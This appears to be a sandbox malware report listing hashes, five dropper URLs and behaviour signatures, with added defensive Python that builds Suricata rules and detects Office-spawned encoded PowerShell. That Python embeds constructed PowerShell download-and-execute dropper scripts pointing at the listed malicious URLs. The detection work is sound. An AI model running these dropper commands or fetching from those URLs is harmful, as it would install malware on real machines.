General

  • Target

    034737ddb1d329d6c7972530e5444974_JaffaCakes118

  • Size

    172KB

  • Sample

    240427-py4alabd3x

  • MD5

    034737ddb1d329d6c7972530e5444974

  • SHA1

    baac7d5c80a72757866c34e0a066ee7dfa8fca39

  • SHA256

    ffbf6b1562b8ff882933b9ce4dc9234fd6fbdf6e5be7e645bc6e2461159929bf

  • SHA512

    c0badef0de8f29cd3668c01e5883d6ffe8d03ff95d7906fe7f9bce94019a262842c5d05094787b2452aac20d74bd8089016271f3e08b32ce2af7af26c6c9d806

  • SSDEEP

    3072:i77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qtz8iwrEJOyUU8RdlA:i77HUUUUUUUUUUUUUUUUUUUT52VZiwgT

Score
10/10

Malware Config

Extracted

  • Language: ps1 (deobfuscated)

  • URLs (all of type exe.dropper)

    http://kellydarke.com/wp-content/Sd/
    http://aram-designs.com/en/Z53/
    http://basinhayati.net/wp-admin/Q0aw/
    http://7cut.extroliving.com/wp-content/3LYGE/
    http://allcosmeticsource.com/allcosmeticsource/OT9bg/
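The config above is what the sandbox recovered from the ps1 stage: a list of five exe.dropper URLs, tried in turn until one serves the payload. As an added example (not the page's own script and not the sandbox's extractor), the following Python pulls the URL list out of a constructed stand-in for such a deobfuscated dropper, splits each URL into host and path IOCs, and emits Suricata rules keyed on HTTP host and URI. The PowerShell text, variable names and output file name are constructed; only the five URLs come from the config on this page.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for the deobfuscated ps1 dropper (NOT the page's script).
# It follows the common pattern: one string of URLs joined with '@', split and
# tried in order until a DownloadFile succeeds, then the dropped exe is run.
SAMPLE_PS1 = r"""
$ErrorActionPreference = 'SilentlyContinue';
$out = $env:USERPROFILE + '\' + 'p6k4s' + '.exe';
$wc = New-Object System.Net.WebClient;
$urls = 'http://kellydarke.com/wp-content/Sd/@http://aram-designs.com/en/Z53/@http://basinhayati.net/wp-admin/Q0aw/@http://7cut.extroliving.com/wp-content/3LYGE/@http://allcosmeticsource.com/allcosmeticsource/OT9bg/'.Split('@');
foreach ($u in $urls) {
    try {
        $wc.DownloadFile($u, $out);
        if ((Get-Item $out).Length -ge 40000) { Invoke-Item $out; break }
    } catch {}
}
"""

# Stops at whitespace, quotes, the '@' list separator and common PowerShell punctuation.
URL_RE = re.compile(r"https?://[^\s'\"@;,()]+")


def extract_urls(ps1_text):
    """Return the dropper URLs in script order, de-duplicated."""
    seen = []
    for u in URL_RE.findall(ps1_text):
        if u not in seen:
            seen.append(u)
    return seen


def urls_to_iocs(urls):
    """Split each URL into host and path so DNS and proxy blocklists can be fed separately."""
    return [{"url": u, "host": urlsplit(u).hostname, "path": urlsplit(u).path} for u in urls]


def suricata_rules(iocs, base_sid=9000001):
    """One alert per dropper URL on HTTP host plus URI (Suricata 5+ sticky-buffer syntax).

    The sid range is an assumption; pick one that does not collide with your ruleset.
    """
    rules = []
    for i, ioc in enumerate(iocs):
        rules.append(
            "alert http $HOME_NET any -> $EXTERNAL_NET any "
            f'(msg:"exe.dropper URL {ioc["host"]}"; flow:established,to_server; '
            f'http.host; content:"{ioc["host"]}"; http.uri; content:"{ioc["path"]}"; '
            f"classtype:trojan-activity; sid:{base_sid + i}; rev:1;)"
        )
    return rules


if __name__ == "__main__":
    iocs = urls_to_iocs(extract_urls(SAMPLE_PS1))
    for ioc in iocs:
        print(f'{ioc["host"]:40} {ioc["path"]}')
    print()
    for rule in suricata_rules(iocs):
        print(rule)
```

Matching on host and path together keeps the rule specific to the dropper paths rather than the (compromised, otherwise legitimate) WordPress sites that host them; the bare host list is still worth a lower-severity DNS watch, since the same sites often serve later payload stages under new paths.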

Targets

    • Target

      034737ddb1d329d6c7972530e5444974_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory
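The first signature above is the one worth alerting on in production: an Office process spawning a script host is rarely legitimate, and a hidden-window PowerShell with an encoded command is the usual shape of the ps1 stage. As an added example (not part of this report and not the sandbox's own signature logic), the following Python runs that check over constructed Sysmon Event ID 1 records, decodes any -EncodedCommand argument (PowerShell takes base64 of the UTF-16LE script, and accepts any unambiguous prefix of the switch name, so -e, -ec and -enc are all matched), and cross-references the decoded text against the five exe.dropper URLs from this page. The log lines, process IDs, file paths and the dropper one-liner are constructed; the parent and child process lists are an assumption you should tune to your estate.

```python
import base64
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# The five exe.dropper URLs from this page's extracted config, used as a blocklist.
DROPPER_URLS = [
    "http://kellydarke.com/wp-content/Sd/",
    "http://aram-designs.com/en/Z53/",
    "http://basinhayati.net/wp-admin/Q0aw/",
    "http://7cut.extroliving.com/wp-content/3LYGE/",
    "http://allcosmeticsource.com/allcosmeticsource/OT9bg/",
]


def _b64_utf16le(script):
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed dropper one-liner (NOT the page's script), only used to build the sample log.
_DROPPER_SCRIPT = ("$w = New-Object Net.WebClient; "
                   "$w.DownloadFile('http://kellydarke.com/wp-content/Sd/', $env:TEMP + '\\x.exe'); "
                   "Invoke-Item ($env:TEMP + '\\x.exe')")

# Constructed Sysmon Event ID 1 records as JSON lines (field names as common shippers export them).
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "ProcessId": 4012, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n invoice.doc"},
    {"EventID": 1, "ProcessId": 4388,
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _b64_utf16le(_DROPPER_SCRIPT)},
    {"EventID": 1, "ProcessId": 908, "ParentImage": "C:\\Windows\\System32\\services.exe",
     "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
])

# Longest prefix first; the trailing whitespace requirement keeps -ep (ExecutionPolicy) from matching.
ENC_RE = re.compile(
    r"-(?:encodedcommand|encodedc|encoded|encode|encod|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_events(log_text):
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def detect(events):
    """Flag Office-spawned script hosts; enrich with the decoded command and any known dropper URL."""
    alerts = []
    for e in events:
        if e.get("EventID") != 1:
            continue
        parent, child = basename(e["ParentImage"]), basename(e["Image"])
        if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
            continue
        alert = {"pid": e["ProcessId"], "parent": parent, "child": child,
                 "rules": ["office_spawned_script_host"], "decoded": None, "urls": []}
        decoded = decode_encoded_command(e.get("CommandLine", ""))
        if decoded is not None:
            alert["decoded"] = decoded
            alert["rules"].append("encoded_powershell_command")
            alert["urls"] = [u for u in DROPPER_URLS if u in decoded]
            if alert["urls"]:
                alert["rules"].append("known_dropper_url")
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_LOG)):
        print(f'pid {a["pid"]}: {a["parent"]} -> {a["child"]}  rules={a["rules"]}')
        if a["decoded"]:
            print("  decoded:", a["decoded"])
```

The parent/child rule fires on its own; the URL match only raises severity, because the dropper URLs rotate far faster than the process-tree shape does. Pair this with Sysmon Event ID 3 (network connection) and Event ID 11 (file create) from the same PowerShell PID to cover the other two signatures in the list above.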

MITRE ATT&CK Matrix (ATT&CK v13)

  • Defense Evasion

    Modify Registry (T1112), 1 match

  • Discovery

    Query Registry (T1012), 2 matches
    System Information Discovery (T1082), 2 matches
